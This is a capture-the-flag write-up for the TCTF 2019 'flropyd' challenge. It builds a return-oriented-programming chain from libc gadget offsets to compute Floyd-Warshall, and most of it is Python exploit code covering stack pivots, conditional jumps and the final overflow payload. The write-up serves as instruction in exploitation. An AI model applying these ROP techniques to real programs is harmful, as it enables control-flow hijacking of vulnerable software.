TCTF 2019 - flropyd (366pt)

advanced ROP

March 25, 2019
reversing

flropyd (366pt)

Reversing

Description: People always say that rop is turing complete, show me by implementing the Floyd-Warshall algorithm

system: ubuntu-18.04

update1: you can download libc here

update2: md5(libc.so.6) == 50390b2ae8aaa73c47745040f54e602f

Files: flropyd

Solution:

This was a super fun challenge. The program gives you the address of malloc in libc and asks you to provide a ropchain that will “implement the Floyd-Warshall algorithm.”

The program checks this by first chosing a random, bounded integer N (stored at 0x602060) and then creating a random weighted edge matrix that starts at 0x602068 in memory.

The program then calls fork and the child program severely sandboxes itself and then executes the ropchain. The parent program executes it’s own version of the Floyd-Warshall algorithm which converts the edge matrix into a shortest-distance matrix.

The edge matrix in the parent’s memory is compared to the child and if they are equal, the check succeeds. Then this process is repeated 9 more times to verify that the ropchain actually works and if all checks pass, you get the flag.

The edge matrix is always a 64x64 qword array but only the values up to N are set during initialization.

In order to complete this challenge, we need to write a ropchain that does the following:

for a in range(N):
    for b in range(N):
        for c in range(N):
            if edges[b][c] > edges[b][a] + edges[a][c]:
                edges[b][c] = edges[b][a] + edges[a][c]

This is a fairly simple algorithm but some difficulties arise when trying to implement it via ROP.

My approach was to build up a set of ROP primatives that could perform progressively higher level operations.

The first task was to find a series of gadgets that could implement “jump if less than”. Since our ROP “instruction pointer” is actually just the stack pointer, we need to find some gadgets that can conditionally modify the stack pointer based on two arguments.

This was definitely the hardest part of the challenge. When the child program initially executes the ropchain, it has been copied onto the stack. However, the same ropchain also exists in the data section (it starts at 0x60a080). If we can transition from executing the stack ropchain (with large 64 bit addresses) to the data section ropchain, we can use gadgets that just modifiy esp and we can use absolute ropchain addresses.

This is my unconditional jump primative:

def jump(addr):
    buf = ''
    
    # dereference gadget
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(addr)

    # fix spacing
    buf += p64(base + 0x000000000003eb0b) # pop rcx
    buf += p64(base + 0x000000000003eb0b) # pop rcx

    buf += p64(base + 0x00000000000941b1) # mov qword ptr [rsp + 8], rax ; call rcx
    buf += p64(base + 0x0000000000003960) # pop rsp
    buf += p64(0) # junk (gets overwritten)

    return buf

It works by setting rax and then writing rax to rsp + 8. It has the side effect of calling rcx so beforehand, we need to set rcx to a gaget that pops a single register so that we uncorrupt the stack. In this case, I just set rcx to point to the pop rcx gadget. Finally we hit pop rsp which pops the value that we wrote with rax and acts as a jump.

Next, I created a simple “write what where” gadget that allows me to put a value in memory:

def write_what_where(mem, val):
    buf = ''
    buf += p64(base + 0x000000000003eb0b) # pop rcx ; ret
    buf += p64(val)
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(mem)
    buf += p64(base + 0x00000000000a8094) # mov qword ptr [rdx], rcx ; ret
    return buf

Then I was able to find a gadget that sets esp and with some interesting logic, it is possible to conditionally set this value. I created the following primitive which compares the value in two memory locations and “jumps” to one address if the first is less than the other, or the second otherwise:

def if_less_than_mem_mem_better(mem, mem2, addr_lt, addr_gte):
    buf = ''

    # dereference second memory value and store in rdx
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(mem2)
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
    buf += p64(base + 0x00000000001415dd) # mov rdx, rax

    # dereference first memory value and store in rax
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(mem)
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

    # perform subtraction
    buf += p64(base + 0x00000000000438fd) # sub rax, rdx

    # arithmetic shift to get 0 or -1
    buf += p64(base + 0x0000000000134bfc) # sar rax, 6
    buf += p64(base + 0x0000000000134bfc) # sar rax, 6
    buf += p64(base + 0x0000000000134bfc) # sar rax, 6

    # compute correct address for jump table
    buf += p64(base + 0x000000000002155f) # pop rdi
    buf += p64(8)
    buf += p64(base + 0x0000000000023e6a) # pop rsi
    buf += p64(0x602030)
    buf += p64(base + 0x00000000001216de) # and rax, rdi ; or rax, rsi

    # if lt, rax = 0x602038
    # else, rax = 0x602030

    buf += write_what_where(0x602038, addr_lt)
    buf += write_what_where(0x602030, addr_gte)

    # dereference gadget
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

    # set rdx to ret gadget
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(base + 0x00000000000008aa) # ret

    # set stack pointer
    buf += p64(base + 0x000000000003ecaa) # mov esp, eax ; mov rbp, r9 ; nop ; jmp rdx

    return buf

This primative firsts sets rax and rdx to the values in the two memory locations. Then it performs sub rax, rdx and shifts the result so that we end up with either all 1’s (-1 in two’s compliment) or all zeros.

Then it performs (rax & 0x8) + 0x602030 which sets rax to point to 0x602038 if rax < rdx otherwise it will point to 0x602030. By putting the two stack addresses we would like to jump to in these corresponding memory locations, we can dereference it and call the mov esp, eax gadget.

The only mov esp, eax gadget also jumps to rdx as a side effect so we can just set rdx to point to a ret gadget in order to preserve the stack.

Next, I found it useful to create a copy_memory primative that can copy a value from one address to another. This was fairly simple:

def copy_memory(mem_from, mem_to):
    buf = ''
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(mem_from)
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(mem_to)
    buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
    return buf

In order to index into the edge array, I created a primative that would take two memory locations that hold index values and a third location that would receive the value of the edge array:

def index_edge_array(mem_idx1, mem_idx2, save_to):
    buf = ''

    # copy index1 to junk counter
    buf += copy_memory(mem_idx1, 0x602058)

    # compute (idx1 * 64)
    buf += p64(base + 0x000000000002155f) # pop rdi
    buf += p64(0x602058 + 5)
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

    # dereference temp into edi
    # edi = (idx1 * 64)
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(0x602058)
    buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

    # dereference idx2
    # rax = idx2
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(mem_idx2)
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

    # add together
    # rax = idx2 + (idx1 * 64)
    buf += p64(base + 0x00000000000a8473) # add rax, rdi

    # save intermediate computation to temp memory
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(0x602058)
    buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

    # shift left 3 times
    buf += p64(base + 0x000000000002155f) # pop rdi
    buf += p64(0x602058 + 5)
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

    # dereference temp into edi
    # edi = (idx2 + (idx1 * 64)) * 8
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(0x602058)
    buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

    # add edge base offset
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(0x602068)

    # rax = (idx2 + (idx1 * 64)) * 8 + 0x602068
    buf += p64(base + 0x00000000000a8473) # add rax, rdi

    # lookup the edge value at this address
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

    # save the value to the memory location
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(save_to)
    buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

    return buf

This function performs *save_to = edges[*mem_idx1][*mem_idx2]. I used the location at 0x602058 as scratch memory since the shl gadget I found operated directly on memory values rather than register values.

Similarly, I wrote a primative that can save a value to the edge array. It is nearly identical:

def write_index_edge_array(mem_idx1, mem_idx2, load_from):
    buf = ''

    # copy index1 to junk counter
    buf += copy_memory(mem_idx1, 0x602058)

    # compute (idx1 * 64)
    buf += p64(base + 0x000000000002155f) # pop rdi
    buf += p64(0x602058 + 5)
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

    # dereference temp into edi
    # edi = (idx1 * 64)
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(0x602058)
    buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

    # dereference idx2
    # rax = idx2
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(mem_idx2)
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

    # add together
    # rax = idx2 + (idx1 * 64)
    buf += p64(base + 0x00000000000a8473) # add rax, rdi

    # save intermediate computation to temp memory
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(0x602058)
    buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

    # shift left 3 times
    buf += p64(base + 0x000000000002155f) # pop rdi
    buf += p64(0x602058 + 5)
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1
    buf += p64(base + 0x00000000001ab548) # shl dword ptr [rdi - 5], 1

    # dereference temp into edi
    # edi = (idx2 + (idx1 * 64)) * 8
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(0x602058)
    buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

    # add edge base offset
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(0x602068)

    # rax = (idx2 + (idx1 * 64)) * 8 + 0x602068
    buf += p64(base + 0x00000000000a8473) # add rax, rdi

    # move the edge pointer into edi
    # (in a convoluted way)
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(0x602058)
    buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax
    buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

    # dereference the load_from address
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(load_from)
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

    # save new edge value
    buf += p64(base + 0x000000000003fdfa) # mov qword ptr [rdi], rax ; xor eax, eax

    return buf

Finally, I needed a primative that could add two memory locations:

def add_mem_mem(mem_a, mem_b):
    buf = ''

    # load mem_a into edi
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(mem_a)
    buf += p64(base + 0x00000000001ab806) # mov edi, dword ptr [rdx]

    # load mem_b into rax
    buf += p64(base + 0x00000000000439c8) # pop rax
    buf += p64(mem_b)
    buf += p64(base + 0x0000000000145c98) # mov rax, qword ptr [rax]

    # add
    buf += p64(base + 0x00000000000a8473) # add rax, rdi

    # store in mem_a
    buf += p64(base + 0x0000000000001b96) # pop rdx
    buf += p64(mem_a)
    buf += p64(base + 0x000000000003093c) # mov qword ptr [rdx], rax

    return buf

and a primative that could increment a memory location:

def increment_memory(mem):
    buf = ''
    buf += p64(base + 0x000000000003eb0b) # pop rcx ; ret
    buf += p64(mem + 0x77)
    buf += p64(base + 0x00000000000ea224) # inc dword ptr [rcx - 0x77]
    return buf

Using these primatives we can write some assembly-like pseudocode:

# memory address that store local variable values
VAR_A = 0x602040
VAR_B = 0x602048
VAR_C = 0x602050

TEMP_0 = 0x602018
TEMP_1 = 0x602020

# size of edge array
NUM = 0x602060

_rop_init_I_guess:
    jump(<start>) # move to the ropchain in the data section

start:
    write_what_where(VAR_A, 0)    # var a = 0

a_loop:
    write_what_where(VAR_B, 0)    # var b = 0

b_loop:
    write_what_where(VAR_C, 0)    # var c = 0

c_loop:
    # index into the edge array and save to memory
    index_edge_array(VAR_A, VAR_C, TEMP_0)      # temp_0 = e[c][a]
    index_edge_array(VAR_B, VAR_A, TEMP_1)      # temp_1 = e[a][b]

    # temp_0 = e[c][a] + e[a][b]
    add_mem_mem(TEMP_0, TEMP_1)

    index_edge_array(VAR_B, VAR_C, TEMP_1)      # temp_1 = e[c][b]

    # if e[c][a] + e[c][b] < e[c][b] {CONT}{SKIP}
    if_less_than_mem_mem_better(TEMP_0, TEMP_1, <cont>, <skip>)

cont:
    # e[c][b] = e[c][a] + e[a][b]
    write_index_edge_array(VAR_B, VAR_C, TEMP_0)

skip:
    # c += 1
    increment_memory(VAR_C)
    if_less_than_mem_mem_better(VAR_C, NUM, <c_loop>, <inc_b>)

inc_b:
    # b += 1
    increment_memory(VAR_B)
    if_less_than_mem_mem_better(VAR_B, NUM, <b_loop>, <inc_a>)

inc_a:
    # a += 1
    increment_memory(VAR_A)
    if_less_than_mem_mem_better(VAR_A, NUM, <a_loop>, <done>)

done:
    ...

For the final exploit, I put in print statements to compute the correct label addresses and then I hardcoded them into the rop primative calls for the final buffer:

buf = ''

# spacing to get to the first return address
buf += 'a' * 0x18

# jump {START}
buf += jump(0x60a0d0)

print('LABEL START: 0x%x' % (buf_base + len(buf)))

buf += write_what_where(0x602040, 0)    # var a = 0

print('LABEL A: 0x%x' % (buf_base + len(buf)))

buf += write_what_where(0x602048, 0)    # var b = 0

print('LABEL B: 0x%x' % (buf_base + len(buf)))

buf += write_what_where(0x602050, 0)    # var c = 0

print('LABEL C: 0x%x' % (buf_base + len(buf)))

# index into the edge array and save to memory
buf += index_edge_array(0x602040, 0x602050, 0x602018)   # 0x602018 = e[c][a]

print('LABEL second index: 0x%x' % (buf_base + len(buf)))

buf += index_edge_array(0x602048, 0x602040, 0x602020)   # 0x602020 = e[a][b]

print('LABEL add mem: 0x%x' % (buf_base + len(buf)))

buf += add_mem_mem(0x602018, 0x602020)  # 0x602018 = e[c][a] + e[a][b]

print('LABEL third index: 0x%x' % (buf_base + len(buf)))

buf += index_edge_array(0x602048, 0x602050, 0x602020)   # 0x602020 = e[c][b]

print('LABEL comparison: 0x%x' % (buf_base + len(buf)))

# if e[c][a] + e[c][b] < e[c][b] {CONT}{SKIP}
buf += if_less_than_mem_mem_better(0x602018, 0x602020, 0x60a630, 0x60a788)

print('LABEL CONT: 0x%x' % (buf_base + len(buf)))

buf += write_index_edge_array(0x602048, 0x602050, 0x602018)

print('LABEL SKIP: 0x%x' % (buf_base + len(buf)))

# c += 1
buf += increment_memory(0x602050)

# if (c < *num) {C}{INC_B}
buf += if_less_than_mem_mem_better(0x602050, 0x602060, 0x60a148, 0x60a890)

print('LABEL INC_B: 0x%x' % (buf_base + len(buf)))

# b += 1
buf += increment_memory(0x602048)

# if (b < *num) {B}{INC_A}
buf += if_less_than_mem_mem_better(0x602048, 0x602060, 0x60a120, 0x60a998)

print('LABEL INC_A: 0x%x' % (buf_base + len(buf)))

# a += 1
buf += increment_memory(0x602040)

# if (a < *num) {A}{DONE}
buf += if_less_than_mem_mem_better(0x602040, 0x602060, 0x60a0f8, 0x60aaa0)

print('LABEL DONE: 0x%x' % (buf_base + len(buf)))

flropyd (366pt)

Read more